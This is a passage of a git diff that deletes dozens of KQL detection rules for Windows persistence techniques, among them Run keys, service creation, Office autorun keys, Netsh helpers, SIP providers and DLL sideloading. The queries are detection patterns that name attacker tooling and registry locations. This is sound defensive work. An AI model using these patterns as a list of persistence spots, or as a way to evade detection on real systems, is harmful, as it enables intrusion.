Bencherchali (Nextron Systems) -// Date: 2021/12/29 -// Level: medium -// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. -The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. - -// Tags: attack.persistence, attack.t1547.009 -DeviceFileEvents -| where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\" \ No newline at end of file diff --git a/Persistence/New_Kernel_Driver_Via_SC.EXE.kql b/Persistence/New_Kernel_Driver_Via_SC.EXE.kql deleted file mode 100644 index 1dbdb0cb..00000000 --- a/Persistence/New_Kernel_Driver_Via_SC.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/14 -// Level: medium -// Description: Detects creation of a new service (kernel driver) with the type "kernel" -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe" \ No newline at end of file diff --git a/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql b/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql deleted file mode 100644 index 30e9ae74..00000000 --- a/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/11/28 -// Level: high -// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper - -// Tags: attack.persistence, attack.t1546.007 -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\"))) \ No newline at end of file diff --git a/Persistence/New_ODBC_Driver_Registered.kql b/Persistence/New_ODBC_Driver_Registered.kql deleted file mode 100644 index 08b8669c..00000000 --- a/Persistence/New_ODBC_Driver_Registered.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/23 -// Level: low -// Description: Detects the registration of a new ODBC driver. -// Tags: attack.persistence -DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey contains "\\SQL Server"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver")))) \ No newline at end of file diff --git a/Persistence/New_Outlook_Macro_Created.kql b/Persistence/New_Outlook_Macro_Created.kql deleted file mode 100644 index d9d853ed..00000000 --- a/Persistence/New_Outlook_Macro_Created.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @ScoubiMtl -// Date: 2021/04/05 -// Level: medium -// Description: Detects the creation of a macro file for Outlook. -// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" \ No newline at end of file diff --git a/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql b/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql deleted file mode 100644 index d2608baa..00000000 --- a/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing -// Date: 2018/08/25 -// Level: high -// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (((RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Desktop\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "%temp%\\" or RegistryValueData contains "%tmp%\\") or (RegistryValueData startswith "%Public%\\" or RegistryValueData startswith "wscript" or RegistryValueData startswith "cscript")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce")) and (not(((RegistryValueData contains "rundll32.exe C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32" and RegistryValueData contains "C:\\Windows\\Temp\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\"))) \ No newline at end of file diff --git a/Persistence/New_Service_Creation_Using_PowerShell.kql b/Persistence/New_Service_Creation_Using_PowerShell.kql deleted file mode 100644 index ce9fb3fa..00000000 --- a/Persistence/New_Service_Creation_Using_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2023/02/20 -// Level: low -// Description: Detects the creation of a new service using powershell. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName" \ No newline at end of file diff --git a/Persistence/New_Service_Creation_Using_Sc.EXE.kql b/Persistence/New_Service_Creation_Using_Sc.EXE.kql deleted file mode 100644 index dd56c1e4..00000000 --- a/Persistence/New_Service_Creation_Using_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2023/02/20 -// Level: low -// Description: Detects the creation of a new service using the "sc.exe" utility. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe" \ No newline at end of file diff --git a/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql b/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql deleted file mode 100644 index ef12160b..00000000 --- a/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2022/06/19 -// Level: high -// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. -Adversaries may abuse time providers to execute DLLs when the system boots. -The Windows Time service (W32Time) enables time synchronization across and within domains. - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.003 -DeviceRegistryEvents -| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL")))) \ No newline at end of file diff --git a/Persistence/New_User_Created_Via_Net.EXE.kql b/Persistence/New_User_Created_Via_Net.EXE.kql deleted file mode 100644 index a83f4599..00000000 --- a/Persistence/New_User_Created_Via_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community) -// Date: 2018/10/30 -// Level: medium -// Description: Identifies the creation of local users via the net.exe command. -// Tags: attack.persistence, attack.t1136.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql b/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql deleted file mode 100644 index 7e3622ff..00000000 --- a/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/12 -// Level: high -// Description: Detects creation of local users via the net.exe command with the option "never expire" -// Tags: attack.persistence, attack.t1136.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Persistence/Office_Application_Startup_-_Office_Test.kql b/Persistence/Office_Application_Startup_-_Office_Test.kql deleted file mode 100644 index 83afa561..00000000 --- a/Persistence/Office_Application_Startup_-_Office_Test.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: omkar72 -// Date: 2020/10/25 -// Level: medium -// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started -// Tags: attack.persistence, attack.t1137.002 -DeviceRegistryEvents -| where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf" \ No newline at end of file diff --git a/Persistence/Office_Autorun_Keys_Modification.kql b/Persistence/Office_Autorun_Keys_Modification.kql deleted file mode 100644 index a9ff5181..00000000 --- a/Persistence/Office_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office") and (RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (not(((InitiatingProcessFolderPath =~ "C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe" and RegistryKey contains "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt") or RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey contains "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1" or RegistryKey contains "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect" or RegistryKey contains "\\Excel\\Addins\\NativeShim" or RegistryKey contains "\\Excel\\Addins\\NativeShim.InquireConnector.1" or RegistryKey contains "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1" or RegistryKey contains "\\Outlook\\AddIns\\AccessAddin.DC" or RegistryKey contains "\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin" or RegistryKey contains "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector" or RegistryKey contains "\\Outlook\\AddIns\\EvernoteOLRD.Connect" or RegistryKey contains "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1" or RegistryKey contains "\\Outlook\\Addins\\OcOffice.OcForms" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey contains "\\Outlook\\Addins\\OscAddin.Connect" or RegistryKey contains "\\Outlook\\Addins\\OutlookChangeNotifier.Connect" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/Persistence/OilRig_APT_Registry_Persistence.kql b/Persistence/OilRig_APT_Registry_Persistence.kql deleted file mode 100644 index 83beccff..00000000 --- a/Persistence/OilRig_APT_Registry_Persistence.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -// Date: 2018/03/23 -// Level: critical -// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report -// Tags: attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense_evasion, attack.t1112, attack.command_and_control, attack.t1071.004 -DeviceRegistryEvents -| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT" \ No newline at end of file diff --git a/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql b/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql deleted file mode 100644 index 2f3f3dd3..00000000 --- a/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @ScoubiMtl -// Date: 2021/04/05 -// Level: high -// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros. -// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546 -DeviceRegistryEvents -| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level" \ No newline at end of file diff --git a/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql b/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql deleted file mode 100644 index 88473077..00000000 --- a/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/28 -// Level: medium -// Description: Detects changes to the registry values related to outlook security settings -// Tags: attack.persistence, attack.t1137 -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Outlook\\Security" \ No newline at end of file diff --git a/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql b/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql deleted file mode 100644 index 67f96f11..00000000 --- a/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/21 -// Level: high -// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029 -DeviceFileEvents -| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-" \ No newline at end of file diff --git a/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql deleted file mode 100644 index 5662813f..00000000 --- a/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton (HAWK.IO) -// Date: 2021/12/09 -// Level: medium -// Description: Detects a when net.exe is called with a password in the command line -// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078 -DeviceProcessEvents -| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file diff --git a/Persistence/Path_To_Screensaver_Binary_Modified.kql b/Persistence/Path_To_Screensaver_Binary_Modified.kql deleted file mode 100644 index 0e968bc4..00000000 --- a/Persistence/Path_To_Screensaver_Binary_Modified.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bartlomiej Czyz @bczyz1, oscd.community -// Date: 2020/10/11 -// Level: medium -// Description: Detects value modification of registry key containing path to binary used as screensaver. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.002 -DeviceRegistryEvents -| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe"))) \ No newline at end of file diff --git a/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql b/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql deleted file mode 100644 index f6b54c27..00000000 --- a/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql +++ /dev/null @@ -1,13 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. -The disk cleanup manager is part of the operating system. -It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. -Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. -Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. -Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. - -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString"))) \ No newline at end of file diff --git a/Persistence/Persistence_Via_Hhctrl.ocx.kql b/Persistence/Persistence_Via_Hhctrl.ocx.kql deleted file mode 100644 index 288132ef..00000000 --- a/Persistence/Persistence_Via_Hhctrl.ocx.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx")) \ No newline at end of file diff --git a/Persistence/Persistence_Via_New_SIP_Provider.kql b/Persistence/Persistence_Via_New_SIP_Provider.kql deleted file mode 100644 index 08cf0096..00000000 --- a/Persistence/Persistence_Via_New_SIP_Provider.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion -// Tags: attack.persistence, attack.defense_evasion, attack.t1553.003 -DeviceRegistryEvents -| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll")))) \ No newline at end of file diff --git a/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql b/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql deleted file mode 100644 index c30822e7..00000000 --- a/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/22 -// Level: medium -// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt -// Tags: attack.persistence -DeviceProcessEvents -| where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths" \ No newline at end of file diff --git a/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql deleted file mode 100644 index 8867fa02..00000000 --- a/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov -// Date: 2019/10/26 -// Level: high -// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command")) \ No newline at end of file diff --git a/Persistence/Potential_7za.DLL_Sideloading.kql b/Persistence/Potential_7za.DLL_Sideloading.kql deleted file mode 100644 index f1cc961b..00000000 --- a/Persistence/Potential_7za.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/06/09 -// Level: low -// Description: Detects potential DLL sideloading of "7za.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql b/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql deleted file mode 100644 index 6eca1244..00000000 --- a/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Muhammad Faisal -// Date: 2023/08/02 -// Level: medium -// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. -// Tags: attack.command_and_control, attack.persistence, attack.t1219 -DeviceProcessEvents -| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe" \ No newline at end of file diff --git a/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql b/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql deleted file mode 100644 index 000b03f0..00000000 --- a/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET")))) \ No newline at end of file diff --git a/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql b/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql deleted file mode 100644 index af503f0f..00000000 --- a/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/17 -// Level: medium -// Description: Detects PowerShell creating a binary executable or a script file. -// Tags: attack.persistence -DeviceFileEvents -| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not((((FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Windows\\Temp\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql b/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql deleted file mode 100644 index 1c5d0f3d..00000000 --- a/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerDU.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql deleted file mode 100644 index 7d335d90..00000000 --- a/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith 